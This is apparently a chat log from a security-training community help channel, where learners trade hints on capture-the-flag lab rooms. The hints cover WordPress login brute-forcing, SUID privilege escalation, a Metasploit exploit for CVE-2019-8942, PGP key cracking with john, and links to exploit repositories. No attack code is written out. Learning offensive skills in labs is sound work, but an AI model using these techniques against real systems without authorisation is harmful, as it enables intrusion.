Can somebody help with a nudge for blog room. I am www-data user, not sure how to upgrade to bjoel user. I ran lse, linenum and linpeas but couldn't find anything useful other then the DB and Joel's wordpress password. but that's not valid for bjoel su or ssh. any nudges?

Consider that you don't actually need to upgrade to bjoel.

Hello, I'm on day 11 of Advent of cyber and stucked on ftp part, it returns "500 Illegal PORT command.; ftp: bind: Address already in use" every time i try to execute a command like ls or get, should it happen?

Switch to an EU VPN server

Thanks, I'll try

@stuck fractal excuse me again, i'm looking at the system call but i don't understand how to interact with them.. any suggestion for me please?

Try to understand the code

the entire code or i need to focus on the main?

:

@potent quail @sturdy shadow change the payload, it will help
@crisp wigeon Thanks that worked.

the entire code or i need to focus on the main?
@white salmon Have you done any RE before?

This is probably basic level RE

nope..

Yeah I would wager you don't need gdb at all for this

But it helps

Need a hint for the Bonus challenge in Learn Linux 🙂

Task 43. Only task preventing me from finishing the room

nope..
@white salmon I recommend taking a break and learning some basic RE then

Ghidra/cutter/r2

i am trying week 2 of christmas challenge now and i found the hidden page

but where am i supposed to search for the password

ive tried a lot and cant find it

...Week 2?

uhm sorry

day 2

this lol

Check the page source

And do some research on the site it mentioned

yeah i got it now but i think at the place where i looked

there was supposed to be a link

but it wasnt there

there was no link here xd

think it was supposed to be there?

There wasn't supposed to be a link

you're told github repo

so you do some searching on github

ah okay thx

Blog box - Spent today enumerating and still cannot see a privesc out of www.data or a way to find user.txt. Please can someone point me in the right direction. Many thanks.

Run some privesc enumeration scripts

Pay attention to the output

Run some privesc enumeration scripts
@stuck fractal Tried most of the usual scripts, maybe spending a day on this box has made me blind:-)

I found it without scripts

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md
@stuck fractal Thanks

I am having problems decrypting pgp keys, I am getting the following error, gpg: decryption failed: secret key not available

Did you import the secret key?

Are you decrypting keys or files?

What room, task, question?

decrypting keys

its the tomghost room

You need to import the key

You might need to crack a passphrase

I used gpg2john to convert the key, then cracked it with john

So you still need to import the key

Then you can decrypt the files using that key

aaah ok, thanks

just to check, the key is the output from john? of the actual pgp file?

Nope?

got it! I've never done pgp before

any recomendations for rooms??

I have a room on this coming soon

ok great!

Are you a subscriber?

yeah

You'll be able to do it when it comes out then

Don't have an ETA at the moment, but it's ready to be released

Blog completed

If anybody need help, feel free to pm me

I loved the room

@stuck fractal thank you for the suggestions, i'm starting to practice on RE. i will let you know if i have problem

Just ask here if it's THM content

NamelessOne genius

No need for me specifically

@verbal wedge ^ ❤️

Don't have an ETA at the moment, but it's ready to be released
@stuck fractal Thanks a lot, I will keep an eye out for it!

I'm glad you liked it

It was a pain in the ass to configure lol

hahaha

It was worth it

I guess

ZTHObscureWebVulns Task 18, jwt.io says ||an algorithm of none is invalid||, is my setting somewhere else incorrect?

hi , need some help in Blog . thanx

@cedar coral You got to let us know more? Room, task, question, what have you tried and where do you fail?

^

I can help but need something to go off of

Hey I found user.txt for Jeff, but it does not seem to work. ||I ran md5sum on user.txt. Ran it on the whole contents and the content between the {}. Did the same with sha1sum but no luck|| What am I doing wrong?

add THM in front of it

Thanks! Got it

moved from general 🙂 . When running hydra i get the below but how do i get see the password ? STATUS] 1646.00 tries/min, 1646 tries in 00:01h, 14342753 to do in 145:14h, 16 active
[80][http-post-form] host: IP login: USERNAME
1 of 1 target successfully completed, 1 valid password found

When hydra says login rather than username and password, it means it was the same for both

Or you only fuzzed one field (I think, not so sure about this one)

arh okay

Even if you know the username, ^USER^ and -l username

Guess it makes sense 🙂

Hydra is a fairly weird tool for web stuff. Not always as intuitive as it should be

so retro and blaster are basically the same room, but i can not get the verisighn site to open in retro, so that exploit doesnt work. looked at MuirlandOracle writeup, but IE never opens

Retro is intentionally a bit broken

That's why blaster was made

so not completable or just a different way?

It's completable sometimes, really hit or miss

Check the pins in #650425164894568455

you can get privesc of retro with an other exploit

use one from this site https://github.com/SecWiki/windows-kernel-exploits

can't remember which one

@dull palm what evil maid said. The intended exploit didn’t work for me when I did that room either

i did the room just a few days ago. I had the same struggle. then out of nowhere it suddenly did work, its a bit wonky

Thank yall, laptop is now having a fit. I will figure it out.

Hey everyone, not very good at reversing/decompiling ELFs. Any advice/resources for dealing with Blog??

try ghidra

Alright I’ll check it out now. Appreciate it 👍

Eh, a decompiler goes a long way here

Hey ninja, I’m not too savvy with Linux decompilers. Did some googling and used gdb/objdump and was able to see what was going on. Ended up running through ghidra and the code is very clear in there.

So working on exploiting it now

I use Cutter

Which is a gui for radare

You can install ghidra's decompiler (Or the appimage for linux ships with it)

Okay, heard lots of people mention radare in other rooms

I’ll check that out as well

So working on exploiting it now
@mellow notch just an FYI/hint -- once you see what to exploit, it shouldn't take more than a few seconds to implement. if it does, you're on the wrong track.

@mellow notch just an FYI/hint -- once you see what to exploit, it shouldn't take more than a few seconds to implement. if it does, you're on the wrong track.
@toxic scarab

What he said

Thanks everyone, got it figured out. I have done this exploit before dozens of times.... major brain block for a bit. Idk why I didn’t recognize it immediately.

Room uopeasy, anyone know how to do the sqli manually? the hint uses sqlmap, but id like to learn the manual method. Question 6

Has anyone here finished Learn Linux? Need a hint to finish the final task - The True Ending

Make sure to look really hard through all the user directories you have access to

That's exactly what I am doing right now 😄. I think I found the user who is on the sudoers list.

nice then you should be on track!

so uh... Room" uopeasy, i run sqlmap and it doesnt dump anything to answer questions 7 or 8. I ran it as in the hint. Is there something i need to then do after that to dump a certain table? I tried to dump the ||phpmyadmin table|| but that doesnt seem to give anything back

Need help for attackerkb room of question what type of attacker it is

Go to the exploit page, first "comment" thing

I get webmin page

link but I don't find any attacker type there

On attackerkb

First comment thing

States it explicitly.

yes on that I have found the webmin official issue page

No

The attackerkb page

but don't get

The first comment type thing on there

http://www.webmin.com/exploit.html

Wrong page.

Look on the attackerkb article

I get this link from the comment

I've said this 3 times

https://attackerkb.com/comments/47121204-76ee-4d80-960c-74079d2377d0

this one

I have checked that

The page.

But not that comment.

The first comment type thing on there
@stuck fractal

but don't get anything

I've told you where to look

got it bro

See what happens when you don't ignore when people try to help you?

I'm stuck at [Task 43] Bonus Challenge - The True Ending in Learn Linux
I feel that it's something to do with user shiba2, however no luck.
Any hint would be appriciated.

did you try anything?

https://muirlandoracle.co.uk/2020/03/10/learn-linux-write-up/#Task_43_-_The_True_Ending

It's solution 😦

any hints?? for ra room

what have you done?

use spoilers if necessary

https://gyazo.com/e72c26b477a8eefdbda4af288f70b37e

can anyone explain me how exactly I make a GET request with the path as stated above?

Have you considered googling how to make a GET request?

Or looking back through the content in the room, where it explains how?

obviously

but I was in school a bit slow already

I will try one more time tho, and come back very mad when I still havent figured it out, hope that is ok

There's no shame in taking a break for a while

Taking a walk

hey can anyone help me with the last part of the cc:radare2 room

i can't seem to find anything

Did anyone manage to exploit Blog manually and get command execution? I am stuck at the last part, calling the post i just made with cmd. Not getting the same post request as the PoC on github

I didn't fully succeed with that but i want to get the manual exploitation part done for the writeup soon™
the JS script didn't properly send the payload I think

Yeah same, stuck there. I tried adding cmd=id or whatever as part of the json request but only getting the contents of the page

If you make it work please share the blog post with me

if i can't get it to work I might make a python/js script for that

I looked into the js exploit you have already in kali, or the metasploit module. Seems to check out tho

yeah

Cool. I'll keep an eye out. Thanks for that

if you want to progress now you might want to try the metasploit module as I didn't see any other PoC's for this one

Yeah already did, rooted now. Was exploring other options to keep myself busy

How long should the bruteforce for blog take?

Not longer than 5 minutes

Took 2 for me with 64 threads

Hello, I have a question for Blog, the new room, just Yes or No. Is there any Binary reverse enginnering involved, or i can't figure it out?

it's useful but not necessarily required

^

Is it guaranteed that the exploit to get onto the blog box is ||CVE-2019-8942||

yes

Yes

rip I tried it and it didn't wanna work so I went down the rabbithole of ||SMB shares||

did you try to do it manually?

nah

used pub scripts

js script?

the one from exploitdb ye but I couldn't figure out how to embed the shell

afaik that one is broken

try using the metasploit module for this cve

alright

can I DM one of you about the metasploit method

sure

Is there a list of THM blue-team rooms anywhere? Things like SIEM, malware analysis, digital forensics, phishing, IR, etc

Blue Primer.

alright
@green sorrel You may need to change the ||payload||

room Blog, please hint for www-data -> bjoel

hint: skip bjoel

direct root?

hint: skip bjoel
@wooden mist I am getting nowhere.. any hint

suid

ok

any hint on the blog room i have the username ||bjoel || have been brute forcing the login page but no luck

there are some more users

any hint on the blog room i have the username ||bjoel || have been brute forcing the login page but no luck
@sinful plaza

there are some more users
@sinful plaza
@indigo ridge thanks man

let me give a try

@sinful plaza Manual enumeration of Wordpress environments sometimes gets in the way of more than help, try an automated tool like wpscan to do this job, it will give you the return to climb another step in the room

@sinful plaza Manual enumeration of Wordpress environments sometimes gets in the way of more than help, try an automated tool like wpscan to do this job, it will give you the return to climb another step in the room
@merry helm thanks a lot bro let me use wpscan

Feels good to see everyone trying out Blog lol

Hello guys, i need some help with blog. I have a problem with my meterpreter session. Thanks.

What’s wrong with your session?

Thank you for the answer. I have an error when i want to go in the directory with the user.txt. Stdapi_fs_stat

Did you check the permissions of the directory where user.txt is? You won’t be able to access it as a low level user.

Ok thank you, i will check that.

No problem 👍🏼 happy to help.

billy

Wrong chat.

i meant billy joel (blog.thm) hint ?

The room title is Blog.

damn. my bad

Hints depend on what stage you're at

You can't get a hint if we don't know what part you're at

@stuck fractal thanks for correction, yes the room name is Blog.
I think I am on the first stage (trying to getting USER.txt and than ROOT.txt), tried various password combos to get into WP admin portal, but PASS fails, in my enum phase I got wordpress version, wordpress valid usernames, rabbit hole (smb), QR code etc...
what direction should I look for ?

You should have two users.

indeed, yes !

Try some simple brute force on each, for about 5 minutes

Use wpenum

hmmm ok. i use wpscan mostly 😕

That's the one

Names are all similar

i hope i found the valid pass in ROCKYOU.txt.
lets see !

If you need to brute force on tryhackme, the password will be in rockyou

And it will take under 5 minutes to get it.

@stuck fractal Thanks 👍
for helping a newbie.

If it takes more than 5 minutes, you're usually doing something wrong.

got it. understood.
5-8 minutes is the baseline. I got it.

5 minutes is the limit for room creators

thanks for this info.

Can confirm it should only take about 2 minutes with 64 threads

@verbal wedge 64 threads gulps

i ran one user for 7 minutes
then canceled it, now running 2nd user
lets see

Be aware, 5 minutes is for a decent computer so if you don’t get the password and are stuck let them run for 10 minutes instead

@trim haven hmmm
IMO the creators should take this into consideration. and decrease the time limit to 2,2:30 mints

They shouldn’t, you shouldn’t be hacking on a slow computer.

lol

I’m sure your computer is fine but some people hack on old laptops which is why I’m telling you to be aware

I did purposely lower it

I had originally selected a password further down in rockyou that was taking only 4 minutes ish for me

But when a tester tested it it was taking a loooong time

because of VPN, 4minutes may get translated into more than 4 minutes !
(i think)

so, I dont think its about having a FAST CPU or not, the traffic on VPN is usually slow 😕

It would contribute a slight amount of time but not that much I don't think

hmm, maybe you're right .

Also you said you were trying for bjoel

His password won't be crackable

At least not using rockyou

lol. i got it

Which is the standard

06:44 seconds for me

is the time

guys

^_^

thanks ppl.

Now comes the hard part lol

🤦‍♂️